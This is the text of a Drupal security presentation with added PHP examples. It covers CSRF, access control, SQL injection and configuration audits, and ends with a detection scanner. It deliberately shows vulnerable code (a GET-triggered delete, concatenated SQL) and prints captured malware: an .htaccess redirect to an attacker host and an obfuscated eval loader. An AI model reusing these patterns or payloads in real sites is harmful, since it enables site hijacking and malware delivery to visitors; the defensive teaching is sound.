A Brief Analysis of Drupal Security
Andrew Welsh
21 Feb 2012
Presentation Overview
Introduction
What is Drupal
Secure Drupal Code
Drupal Configuration
Personal Drupal Issues
Conclusion
What is Drupal
Drupal is a mature, open-source, PHP-based CMS and web application framework. The Drupal project is composed of two principal bodies of work:
(1) the Drupal core code base
(2) thousands of contributed modules and themes
What is Drupal
Sites that use Drupal: Nasa, The Economist, Ubuntu, 20th Century Fox, Searchlight, Warner Bros Recordings, United Nations – End Poverty 2015, Yahoo! Research, Amnesty International, OpenOffice Extensions, Popular Science, AOL Corporate, Nike, Beijing Olympics, White House
Secure Drupal Code
Form API:
<img src="http://test.com/index.php?delete=12" />
A hidden image tag like the one above, placed on any page an administrator visits, makes the browser send a GET for index.php?delete=12 with the administrator's session cookie attached; if a delete action is reachable by GET, it fires. The Form API prevents this in two ways:
1) A form must be built for the current session before it can be submitted; for logged-in users that build embeds a per-session form token, and a submission whose token does not validate is rejected before any validate or submit handler runs. This makes CSRF much more difficult.
2) Submitted values are validated against the form definition before submit handlers run (required fields, #maxlength, a select or checkbox value must be one of its #options), and values rendered back through t() placeholders or check_plain() are escaped. This makes XSS more difficult.
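The following is an added example, not code from the slides or from Drupal itself: a hypothetical Drupal 7 module ("mymodule", with a hypothetical table {mymodule_item}) that contrasts a GET-triggered delete, which the <img> tag above can fire, with the Form API version and with a tokenised one-click link. Item and path names are assumptions.

```php
<?php
// Added example, not from the slides: a hypothetical Drupal 7 module
// ("mymodule", table {mymodule_item}) contrasting a GET-triggered delete,
// which a hidden <img> tag can fire, with the Form API equivalent.

// Implements hook_menu().
function mymodule_menu() {
  $items = array();

  // VULNERABLE: a GET to mymodule/delete?id=12 deletes the item. A hidden
  // <img src="..."> on any other site fires it; the browser attaches the
  // victim's session cookie, so the permission check alone does not help.
  $items['mymodule/delete'] = array(
    'page callback' => 'mymodule_delete_by_get',
    'access arguments' => array('administer nodes'),
    'type' => MENU_CALLBACK,
  );

  // SAFE: the delete runs through a confirmation form. For logged-in users
  // drupal_get_form() embeds a per-session form_token and rejects any
  // submission whose token does not validate before the handlers run.
  $items['mymodule/item/%/delete'] = array(
    'page callback' => 'drupal_get_form',
    'page arguments' => array('mymodule_delete_confirm_form', 2),
    'access arguments' => array('administer nodes'),
    'type' => MENU_CALLBACK,
  );

  // SAFE, non-form variant: a one-click link that carries an explicit token.
  $items['mymodule/toggle/%'] = array(
    'page callback' => 'mymodule_toggle',
    'page arguments' => array(2),
    'access arguments' => array('administer nodes'),
    'type' => MENU_CALLBACK,
  );
  return $items;
}

function mymodule_delete_by_get() {
  // Reachable by a plain GET with no token: do not do this.
  db_delete('mymodule_item')->condition('id', (int) $_GET['id'])->execute();
  drupal_set_message(t('Deleted.'));
  drupal_goto('mymodule/items');
}

// Form builder. confirm_form() supplies the form_token and a Cancel link;
// the %id placeholder is run through check_plain() by t().
function mymodule_delete_confirm_form($form, &$form_state, $id) {
  $form['id'] = array('#type' => 'value', '#value' => (int) $id);
  return confirm_form($form,
    t('Delete item %id?', array('%id' => (int) $id)),
    'mymodule/items',
    t('This action cannot be undone.'),
    t('Delete'));
}

// Validate handler: only reached once the token check has passed.
function mymodule_delete_confirm_form_validate($form, &$form_state) {
  $exists = db_query('SELECT 1 FROM {mymodule_item} WHERE id = :id',
    array(':id' => $form_state['values']['id']))->fetchField();
  if (!$exists) {
    form_set_error('id', t('No such item.'));
  }
}

// Submit handler: a genuine POST from our own confirmation page.
function mymodule_delete_confirm_form_submit($form, &$form_state) {
  db_delete('mymodule_item')
    ->condition('id', $form_state['values']['id'])
    ->execute();
  drupal_set_message(t('Item deleted.'));
  $form_state['redirect'] = 'mymodule/items';
}

// Builds the tokenised link for the non-form variant.
function mymodule_toggle_link($id) {
  $id = (int) $id;
  return l(t('Toggle'), "mymodule/toggle/$id", array(
    'query' => array('token' => drupal_get_token("mymodule-toggle-$id")),
  ));
}

// Page callback: the token is bound to this item and to the current session,
// so a link copied from one admin's page is useless in another browser.
function mymodule_toggle($id) {
  $id = (int) $id;
  if (empty($_GET['token']) || !drupal_valid_token($_GET['token'], "mymodule-toggle-$id")) {
    return MENU_ACCESS_DENIED;
  }
  db_update('mymodule_item')
    ->expression('enabled', '1 - enabled')
    ->condition('id', $id)
    ->execute();
  drupal_goto('mymodule/items');
}
```

Note that Drupal only adds form_token for authenticated users; an action exposed to anonymous visitors gets no CSRF protection from the Form API and must be designed so that it does not matter.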
Secure Drupal Code
ACL - URL access
http://www.site.com/user/1/delete
1) The menu system handles permission checking before a page callback runs: user_access('administer nodes', $account) for role-based permissions, node_access('update', $node, $account) for per-node grants. A URL like the one above is reachable only by an account the router lets through, whether or not a link to it is shown.
2) drupal_goto() honours a ?destination= parameter only when it is an internal path, so redirects cannot be pointed at an external site (no open redirect).
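Added example, not from the slides or from Drupal core: a hypothetical Drupal 7 module showing the router doing the permission check for a role permission and for a per-node grant, an element-level #access check, and a redirect that takes its target from the query string without becoming an open redirect. The module, path and variable names are assumptions; the extra "//" check in the helper is my own addition, not something drupal_goto() does.

```php
<?php
// Added example, not from the slides: a hypothetical Drupal 7 module showing
// the menu router doing the permission check, an element-level check, and a
// redirect that cannot be turned into an open redirect.

// Implements hook_menu().
function mymodule_menu() {
  $items = array();

  // Role permission gate. With no 'access callback' given, the router calls
  // user_access('administer nodes') for the current user before the page
  // callback is ever invoked; failure yields a 403.
  $items['mymodule/admin'] = array(
    'title' => 'My module settings',
    'page callback' => 'drupal_get_form',
    'page arguments' => array('mymodule_settings_form'),
    'access arguments' => array('administer nodes'),
  );

  // Per-object gate. %node auto-loads the node, and node_access('update',
  // $node) consults both the 'edit own/any ... content' permissions and the
  // node_access grants table, so a user who may edit node 5 need not be able
  // to edit node 6.
  $items['mymodule/node/%node/archive'] = array(
    'page callback' => 'mymodule_archive_node',
    'page arguments' => array(2),
    'access callback' => 'node_access',
    'access arguments' => array('update', 2),
    'type' => MENU_CALLBACK,
  );
  return $items;
}

// Form builder: '#access' => FALSE hides the element and discards any value
// submitted for it, here for users without a second, stricter permission.
function mymodule_settings_form($form, &$form_state) {
  global $user;
  $form['mymodule_purge_archived'] = array(
    '#type' => 'checkbox',
    '#title' => t('Purge archived nodes nightly'),
    '#default_value' => variable_get('mymodule_purge_archived', 0),
    '#access' => user_access('administer site configuration', $user),
  );
  return system_settings_form($form);
}

// Page callback: unpublish, then redirect. drupal_goto() itself honours
// ?destination= only when url_is_external() is FALSE for it, so
// ?destination=http://evil.example is ignored and the path given here is used.
function mymodule_archive_node($node) {
  $node->status = NODE_NOT_PUBLISHED;
  node_save($node);
  drupal_set_message(t('%title archived.', array('%title' => $node->title)));
  drupal_goto(mymodule_safe_return_path('return', 'node/' . $node->nid));
}

// Helper for redirects taken from your own query parameter: apply the same
// internal-only rule drupal_goto() applies to ?destination=, plus a belt and
// braces rejection of scheme-less "//host" paths, which url_is_external()
// does not flag (no colon) but which browsers resolve as absolute URLs.
function mymodule_safe_return_path($param = 'return', $default = '<front>') {
  $path = isset($_GET[$param]) ? (string) $_GET[$param] : '';
  if ($path === '' || url_is_external($path) || strpos($path, '//') === 0) {
    return $default;
  }
  return $path;
}
```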
Secure Drupal Code
Authentication
1) User sessions are destroyed and recreated on logout and login; the session ID is regenerated, which defeats session fixation.
2) Session IDs are changed when permissions change.
3) Auth cookies carry only the session ID; session data lives server-side and is not modifiable by site users.
4) Passwords are stored salted and hashed.
Secure Drupal Code
Database API: use it for every query so that the API enforces security checks (escaping, parameter binding) and good coding standards.
Bind parameters with named placeholders (:name) rather than concatenating values into the SQL string.
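Added example, not from the slides: the same user lookup written the vulnerable way and then with the Drupal 7 Database API, going a little beyond the slide to show array placeholders and the dynamic query builder. The function names are mine; the {users} table and its uid/name/created/access columns are core Drupal.

```php
<?php
// Added example, not from the slides: one lookup written four ways in
// Drupal 7. Function names are hypothetical; {users} is the core table.

// VULNERABLE: string concatenation. ?name=x'+OR+'1'='1 returns every row,
// and a stacked statement can do worse depending on the database driver.
function mymodule_find_bad($name) {
  return db_query("SELECT uid, name FROM {users} WHERE name = '" . $name . "'")
    ->fetchAll();
}

// SAFE: named placeholder. The value is bound by PDO and is never parsed as
// SQL, whatever quotes or keywords it contains.
function mymodule_find_by_name($name) {
  return db_query('SELECT uid, name FROM {users} WHERE name = :name',
    array(':name' => $name))->fetchAll();
}

// Array placeholders expand to IN (:uids_0, :uids_1, ...) automatically, so
// there is no need to implode() ids into the query text.
function mymodule_load_many(array $uids) {
  return db_query('SELECT uid, name FROM {users} WHERE uid IN (:uids)',
    array(':uids' => array_map('intval', $uids)))->fetchAllAssoc('uid');
}

// Dynamic query builder: condition values are bound for you, db_like()
// escapes % and _ in the LIKE pattern, and the ORDER BY column comes from a
// whitelist because placeholders can only carry values, never identifiers
// or keywords.
function mymodule_search($fragment, $sort = 'name') {
  $allowed = array('name', 'created', 'access');
  $sort = in_array($sort, $allowed, TRUE) ? $sort : 'name';
  $query = db_select('users', 'u')
    ->fields('u', array('uid', 'name', 'created'))
    ->condition('u.name', '%' . db_like($fragment) . '%', 'LIKE')
    ->condition('u.uid', 0, '>')
    ->orderBy('u.' . $sort)
    ->range(0, 50);
  return $query->execute()->fetchAll();
}
```

The whitelist in mymodule_search() is the part people forget: binding protects values, but a sort column or direction taken straight from the request is still injectable in any API.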
Drupal Configuration
1) Configure logging appropriately and never display error messages to users (set error reporting to None in production).
2) Never display database connection strings.
3) Check the watchdog (Recent log messages) report regularly.
4) Look at every permission granted to each role, especially the administer permissions.
5) Watch which input (text) formats anonymous and authenticated users may use for comments, etc.; a format allowing raw HTML or PHP is an XSS hole.
Drupal Configuration (v5)
Drupal Configuration
Update Regularly!
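Added example, not from the slides: a hypothetical audit script for a Drupal 7 site that checks the configuration points above (error display, logging, restricted permissions on untrusted roles, text formats, and whether the update module is there to tell you about security releases). Run it from the site root with "drush php-script audit.php" (drush is assumed to be installed; the "safe format" heuristic and the function names are mine, not Drupal's).

```php
<?php
// Added example, not from the slides: a hypothetical Drupal 7 audit script.
// Assumes a bootstrapped site, e.g. run with: drush php-script audit.php

function mymodule_audit() {
  $findings = array();

  // 1) Error display: anything other than "None" leaks paths, queries and
  //    sometimes credentials to anonymous visitors.
  if (variable_get('error_level', ERROR_REPORTING_DISPLAY_ALL) != ERROR_REPORTING_HIDE) {
    $findings[] = 'Error messages are displayed to users (set error_level to None).';
  }
  if (ini_get('display_errors')) {
    $findings[] = 'PHP display_errors is on; disable it in php.ini or settings.php.';
  }

  // 3) Is anything logging at all? With dblog off there is no watchdog report.
  if (!module_exists('dblog') && !module_exists('syslog')) {
    $findings[] = 'Neither dblog nor syslog is enabled; watchdog entries are lost.';
  }

  // 4) Permissions: flag anything a module marked "restrict access" in its
  //    hook_permission() that is granted to the anonymous or authenticated role.
  $restricted = array();
  foreach (module_invoke_all('permission') as $perm => $info) {
    if (!empty($info['restrict access'])) {
      $restricted[$perm] = TRUE;
    }
  }
  $roles = user_roles();
  $grants = user_role_permissions($roles);
  $untrusted = array(DRUPAL_ANONYMOUS_RID, DRUPAL_AUTHENTICATED_RID);
  foreach ($untrusted as $rid) {
    $perms = isset($grants[$rid]) ? array_keys($grants[$rid]) : array();
    foreach ($perms as $perm) {
      if (isset($restricted[$perm])) {
        $findings[] = "Role '{$roles[$rid]}' holds restricted permission '$perm'.";
      }
    }
  }

  // 5) Text formats: a format that allows raw HTML or PHP must not be usable
  //    by untrusted roles, or every comment box becomes an XSS vector.
  foreach (filter_formats() as $format) {
    $perm = filter_permission_name($format);  // FALSE for the fallback format
    foreach ($untrusted as $rid) {
      if ($perm && isset($grants[$rid][$perm]) && !_mymodule_format_is_safe($format)) {
        $findings[] = "Role '{$roles[$rid]}' may use text format '{$format->name}'.";
      }
    }
  }

  // Update regularly: the update module is what reports a security release.
  if (!module_exists('update')) {
    $findings[] = 'Update manager module is disabled; you will not be told about security releases.';
  }
  return $findings;
}

// Heuristic (mine, not Drupal's): a format counts as safe only if the HTML
// tag whitelist filter is on and the PHP evaluator filter is off.
function _mymodule_format_is_safe($format) {
  $filters = filter_list_format($format->format);
  $html_on = !empty($filters['filter_html']->status);
  $php_on = !empty($filters['filter_php']->status);
  return $html_on && !$php_on;
}

foreach (mymodule_audit() as $finding) {
  print "- $finding\n";
}
```

Item 2 (connection strings) is covered by item 1 in practice: the place a database DSN normally leaks is an uncaught PDO exception rendered to the browser.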
Personal Drupal Issues
Public node access
Personal Drupal Issues
Injected .htaccess block: visitors arriving from a search engine or social site (matched on the Referer header) are 301-redirected to an attacker-controlled script, while the site owner, who types the URL directly, sees nothing wrong. The numeric marker comments bracket the injected block.

#336988#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio......sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://forumbeagle.cba.pl/store/traf.php [R=301,L]
</IfModule>
#/336988#
Personal Drupal Issues
JS injection in page.tpl.php
Obfuscated loader injected into the theme's page.tpl.php: the try/catch blocks and the always-true 020 == 0x10 test are browser fingerprinting and anti-analysis noise; the loop decodes 500 array entries byte by byte as asgq[i] + 9 - i % 5 (the first entries decode to "(funct", the start of a wrapped function) and hands the result to eval() through the alias e.

<script type="text/javascript" language="javascript">
try { window.document.body++ } catch (gdsgsdg) { dbshre = 179; }
if (dbshre) {
  asd = 0;
  try { d = document.createElement("div"); d.innerHTML.a = "asd"; } catch (agdsg) { asd = 1; }
  if (!asd) { e = eval; }
  ss = String;
  asgq = new Array(31,94,110,104,94,107.........101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,93,113,99,93,100,34,32,38,90,106,107,92,102,93,61,99,96,100,93,34,93,113,99,93,100,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54);
  s = "";
  for (i = 0; i - 500 != 0; i++) {
    if ((020 == 0x10) && window.document) s += ss["fromCharCode"](1 * asgq[i] - (i % 5 - 5 - 4));
  }
  z = s;
  e(s)
}
</script>
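Added example, not from the slides: a stand-alone PHP command-line scanner for the two infection patterns shown in the last two slides (a Referer-keyed external RewriteRule with numeric marker comments in .htaccess, and a decode-and-eval script block in a theme template). The patterns and the scoring threshold are my own heuristics, not anything shipped with Drupal; run it as "php scan.php /path/to/drupal".

```php
<?php
// Added example, not from the slides: scans a Drupal docroot for the two
// injection patterns above. Heuristics are mine. Usage: php scan.php /docroot

function scan_htaccess($path) {
  $hits = array();
  if (!is_readable($path)) {
    return $hits;
  }
  $text = file_get_contents($path);
  // Drupal's shipped .htaccess never redirects on the Referer; the injected
  // block keys on search-engine/social referers and 301s offsite.
  $pattern = '/RewriteCond\s+%\{HTTP_REFERER\}[^\n]*\n(?:\s*RewriteCond[^\n]*\n)*'
           . '\s*RewriteRule\s+\S+\s+https?:\/\/[^\s\]]+/i';
  if (preg_match($pattern, $text, $m)) {
    $hits[] = 'referer-based external redirect: ' . trim($m[0]);
  }
  // Marker comments such as #336988# / #/336988# bracket injected blocks and
  // never appear in a stock .htaccess.
  if (preg_match_all('/#\/?\d{5,}#/', $text, $m)) {
    $hits[] = 'marker comments: ' . implode(' ', array_unique($m[0]));
  }
  return $hits;
}

function scan_template($path) {
  $hits = array();
  $text = file_get_contents($path);
  // Pull out every <script> block, then look for the decode-and-eval shape:
  // try/catch fingerprinting, a long numeric array, String.fromCharCode and
  // a call to eval (directly or via an alias such as e = eval).
  if (preg_match_all('/<script\b[^>]*>(.*?)<\/script>/is', $text, $blocks)) {
    foreach ($blocks[1] as $js) {
      $score = 0;
      $score += preg_match('/fromCharCode/i', $js);
      $score += preg_match('/\beval\b/', $js);
      $score += preg_match('/new\s*Array\s*\(\s*\d+(?:\s*,\s*\d+){20,}/', $js);
      $score += preg_match('/try\s*\{.*?\}\s*catch\s*\(\w+\)\s*\{.*?\}/s', $js);
      if ($score >= 3) {
        $hits[] = 'obfuscated inline script (score ' . $score . ' of 4)';
      }
    }
  }
  return $hits;
}

// Walks the docroot and returns array(path => array(findings)).
function scan_site($root) {
  $report = array();
  $iter = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
  foreach ($iter as $file) {
    $path = $file->getPathname();
    $name = $file->getFilename();
    if ($name === '.htaccess') {
      $hits = scan_htaccess($path);
    }
    elseif (substr($name, -8) === '.tpl.php') {
      $hits = scan_template($path);
    }
    else {
      continue;
    }
    if ($hits) {
      $report[$path] = $hits;
    }
  }
  return $report;
}

if (PHP_SAPI === 'cli' && isset($argv[1])) {
  foreach (scan_site($argv[1]) as $path => $hits) {
    print "$path\n";
    foreach ($hits as $hit) {
      print "  - $hit\n";
    }
  }
}
```

A scanner like this only finds what it was written for; the reliable check is to diff .htaccess and every theme and module file against the pristine release tarball (or "git status" if the site is deployed from version control), which catches modifications of any shape.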
Conclusion
Personal Thoughts: Drupal is a very good, widely used, peer-reviewed CMS, and the security aspect is well addressed. Always stay current with upgrades. Be careful with custom code (themes or modules) and always have it peer reviewed.
Thank You
Sources: http://drupal.org/writing-secure-code
http://drupal.org/node/766404
http://drupal.org/security/secure-configuration
http://www.mediacurrent.com/blog/drupal-security-review
http://www.slideshare.net/fourkitchens/is-drupal-secure
http://drupalsecurityreport.org/sites/drupalsecurityreport.org/files/drupal-security-white-paper-1-1.pdf
http://drupal.org/documentation/is-drupal-secure
http://www.cameronandwilding.com/blog/pablo/10-most-critical-drupal-security-risks